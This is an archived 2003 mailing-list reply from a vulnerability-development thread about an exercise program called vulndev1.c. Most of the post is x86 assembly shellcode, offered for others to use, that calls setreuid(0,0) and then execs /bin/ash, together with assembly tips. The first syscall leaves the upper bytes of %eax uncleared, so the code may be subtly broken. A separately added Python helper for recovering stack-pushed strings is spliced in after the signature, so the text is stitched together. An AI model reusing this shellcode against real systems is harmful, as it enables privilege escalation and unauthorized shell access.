
Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)

From: sin <sin(at)insolence.net>
Date: Fri May 23 2003 - 12:06:56 EDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

i haven't been really following the thread too much; although i did take a look at the code (vulndev1.c), anyways if someone is having a problem w/ shellcode here is the asm for a generic sys_setreuid/execve shellcode that's on the smaller side.

.section .text

        .global _s

_s:

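	xorl  %ebx,  %ebx   # ebx = 0 (ruid)
	xorl  %ecx,  %ecx   # ecx = 0 (euid)
	movb  $0x46, %al    # sys_setreuid
	int   $0x80

	xorl  %eax,  %eax
	pushl %eax          # NUL terminator for the path string
	pushl $0x6873612f   # hsa/
	pushl $0x6e69622f   # nib/
	movl  %esp,  %ebx   # ebx -> "/bin/ash"
	pushl %eax          # argv[1] = NULL
	pushl %ebx          # argv[0] = pointer to the path
	movl  %esp,  %ecx   # ecx -> argv
	xorl  %edx,  %edx   # edx = envp = NULL
	movb  $0xb,  %al    # sys_execve
	int   $0x80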

ah, this calls /bin/ash; if you don't have it, change the string and make sure to pass the -e flag to ld. it's small, it comes out to like 20+b or similar, i can't remember.

if i misread a post, well ignore me

"Once set in motion, the process of questioning could come to but one end, the erosion of conviction and certitude and collapse into despair" (The Specter of the Absurd, 1988).


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (FreeBSD)

iD8DBQE+zkcioEcehqzkkpgRAr4cAKC9sThgCtXl3BP+ckajYpdxSTVtJwCdHPiR 9cRbv8KlM4VdSkJHxkHU1jc=
=80gt
-----END PGP SIGNATURE-----
Received on Fri May 23 12:27:00 2003
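
For anyone reading a listing like the one in this post during analysis, the path it executes can be recovered mechanically from the push immediates, which is what the reversed `# hsa/` and `# nib/` comments are showing. The following is an added example, not part of the original post: `recover_stack_strings` and its regex-based parsing are assumptions made for illustration, and it only understands 32-bit AT&T `push`/`xor` forms like those above.

```python
import re
import struct

# Instruction lines from the execve half of the listing above (AT&T syntax).
LISTING = """
xorl  %eax,  %eax
pushl %eax
pushl $0x6873612f
pushl $0x6e69622f
movl  %esp,  %ebx
pushl %eax
pushl %ebx
movl  %esp,  %ecx
"""
PUSH_IMM = re.compile(r"pushl?\s+\$(0x[0-9a-fA-F]+|\d+)$")
PUSH_REG = re.compile(r"pushl?\s+%(\w+)$")
XOR_SELF = re.compile(r"xorl?\s+%(\w+),\s*%\1$")
DEST_REG = re.compile(r"%(\w+)$")
WIDE = {"al": "eax", "bl": "ebx", "cl": "ecx", "dl": "edx"}  # 8-bit aliases

def recover_stack_strings(listing, min_len=4):
    """Return printable strings built on the stack by runs of 32-bit pushes."""
    zeroed, run, found = set(), b"", []   # regs known to be 0; bytes in memory order
    def flush():
        nonlocal run
        for part in run.split(b"\x00"):
            if len(part) >= min_len and all(32 <= c < 127 for c in part):
                found.append(part.decode("ascii"))
        run = b""
    for raw in listing.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        imm, reg, xor = (p.match(line) for p in (PUSH_IMM, PUSH_REG, XOR_SELF))
        if imm:      # stack grows down: a later push sits at a lower address
            run = struct.pack("<I", int(imm.group(1), 0)) + run
        elif reg and reg.group(1) in zeroed:   # pushed zero = NUL padding
            run = b"\x00" * 4 + run
        elif xor:
            zeroed.add(xor.group(1))
        else:        # anything else ends the run and may overwrite a register
            flush()
            dest = DEST_REG.search(line)
            if line.startswith("int"):
                zeroed.clear()
            elif dest:
                zeroed.discard(WIDE.get(dest.group(1), dest.group(1)))
    flush()
    return found
```

Calling `recover_stack_strings(LISTING)` returns the single path string the listing pushes.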

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT

